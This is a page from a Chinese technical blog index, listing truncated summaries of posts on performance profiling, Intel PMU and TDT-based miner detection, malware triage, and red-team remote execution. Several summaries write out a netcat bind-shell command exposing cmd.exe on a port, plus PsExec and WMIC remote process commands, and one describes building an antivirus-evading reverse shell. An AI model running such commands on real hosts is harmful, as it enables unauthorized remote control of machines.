上一页 1 ··· 29 30 31 32 33 34 35 36 37 ··· 271 下一页
摘要: 性能分析工具 大量的可用于性能测量的工具可以说明性能测量的重要性。有的性能分析工具支持采样和基于编译器的应用程序性能分析,有时还具有上下文相关的调用图功能。有的工具则支持基于硬件事件的非侵入式且开销较低的采样和分析。还有的工具会利用现代微处理器提供的硬件性能计数器。部分工具可以发现与数据局部性、缓存 阅读全文
posted @ 2022-08-02 11:49 bonelee 阅读(941) 评论(0) 推荐(0) 编辑
摘要: 使用 Perf 进行基于硬件的性能监视 REPORT DOCUMENTATION BUG# 是针对Suse的:https://documentation.suse.com/zh-cn/sles/15-SP2/html/SLES-all/cha-perf.html 摘要REPORT DOCUMENTA 阅读全文
posted @ 2022-08-02 11:22 bonelee 阅读(706) 评论(0) 推荐(0) 编辑
摘要: 从上到下的系统架构分析方法 - Intel PMU Andi Cleen 等 云巅论剑 2019-03-19 18:08 https://mp.weixin.qq.com/s/WLasOy9oZvTptEV5050PFQ Top-down Microarchitecture Analysis Met 阅读全文
posted @ 2022-08-02 11:17 bonelee 阅读(468) 评论(0) 推荐(0) 编辑
摘要: 背景: Intel TDT检测:英特尔®威胁检测技术(TDT),使用 GPU 扫描内存中的恶意软件,GPU加速,CPU 利用率从 20%降至 2%。 挖矿检测:PMU监视的重复数学计算,当恶意软件的算力达到某个阈值时,PMU就会生成预警信号,由机器学习引擎进行分析,确定该活动是否与加密货币矿工相关。 阅读全文
posted @ 2022-08-02 10:05 bonelee 阅读(943) 评论(0) 推荐(0) 编辑
摘要: 这里仅用反弹powershell演示,大家可以发挥脑洞 自创反弹shell免杀五部曲: 1:确定想法 2:实现框架 3:增加保护 4:启动木马 5:维持会话或提权 1|2一,确定想法 用python服务器与客户端的原理制作反弹shell的控制端与被控制端, 最后执行在会话中执行恶意命令来获取一个稳定 阅读全文
posted @ 2022-08-01 16:55 bonelee 阅读(776) 评论(0) 推荐(0) 编辑
摘要: 正向shell: 132机器A上:==>是c2的client nc.exe -L -d -e cmd.exe -p 5555 134机器B上: nc64.exe XXX.132 5555 然后就可以输入命令远控132机器了! 我的nc都放在了桌面,所以在桌面cmd即可! 反弹shell例子: 134 阅读全文
posted @ 2022-08-01 16:40 bonelee 阅读(351) 评论(0) 推荐(0) 编辑
摘要: 最终效果: C:\Users\PSTools>psexec \\XXXIP -u XXX -p XXX -i cmd.exe PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysin 阅读全文
posted @ 2022-08-01 14:59 bonelee 阅读(1156) 评论(0) 推荐(0) 编辑
摘要: 背景:wmic 运行时候出现拒绝访问错误: wmic /node:xxxIP /user:xxx /password:xxx process call create "cmd.exe /c ipconfig>c:\users\xxx\result.txt" 错误: 描述 = 拒绝访问。 解决方法如下 阅读全文
posted @ 2022-08-01 11:47 bonelee 阅读(3208) 评论(0) 推荐(0) 编辑
摘要: 深度解析恶意挖矿攻击:现状、检测及处置手册 奇安信威胁情报中心 2021-11-23 11:49:21 135617 3 背景 11月16日,国家发改委举行新闻发布会,新闻发言人孟玮表示,将以产业式集中式“挖矿”、国有单位涉及“挖矿”和比特币“挖矿”为重点开展全面整治。 接连的重拳出击,体现了国家对 阅读全文
posted @ 2022-07-30 14:49 bonelee 阅读(804) 评论(0) 推荐(0) 编辑
摘要: 恶意代码上机排查思路与方法 阅览目录 1、排查标准 应急响应保留现场经验 2、特征排查-自写上机排查工具 3、进程排查 1)数字签名排查 2)联网进程排查 3)进程注入技术排查 4)进程替换技术排查 4、文件排查 1)进程文件排查 2)驱动排查 5、启动信息排查 6、内存排查 1)异地操作 2)本地 阅读全文
posted @ 2022-07-29 10:47 bonelee 阅读(532) 评论(0) 推荐(0) 编辑
上一页 1 ··· 29 30 31 32 33 34 35 36 37 ··· 271 下一页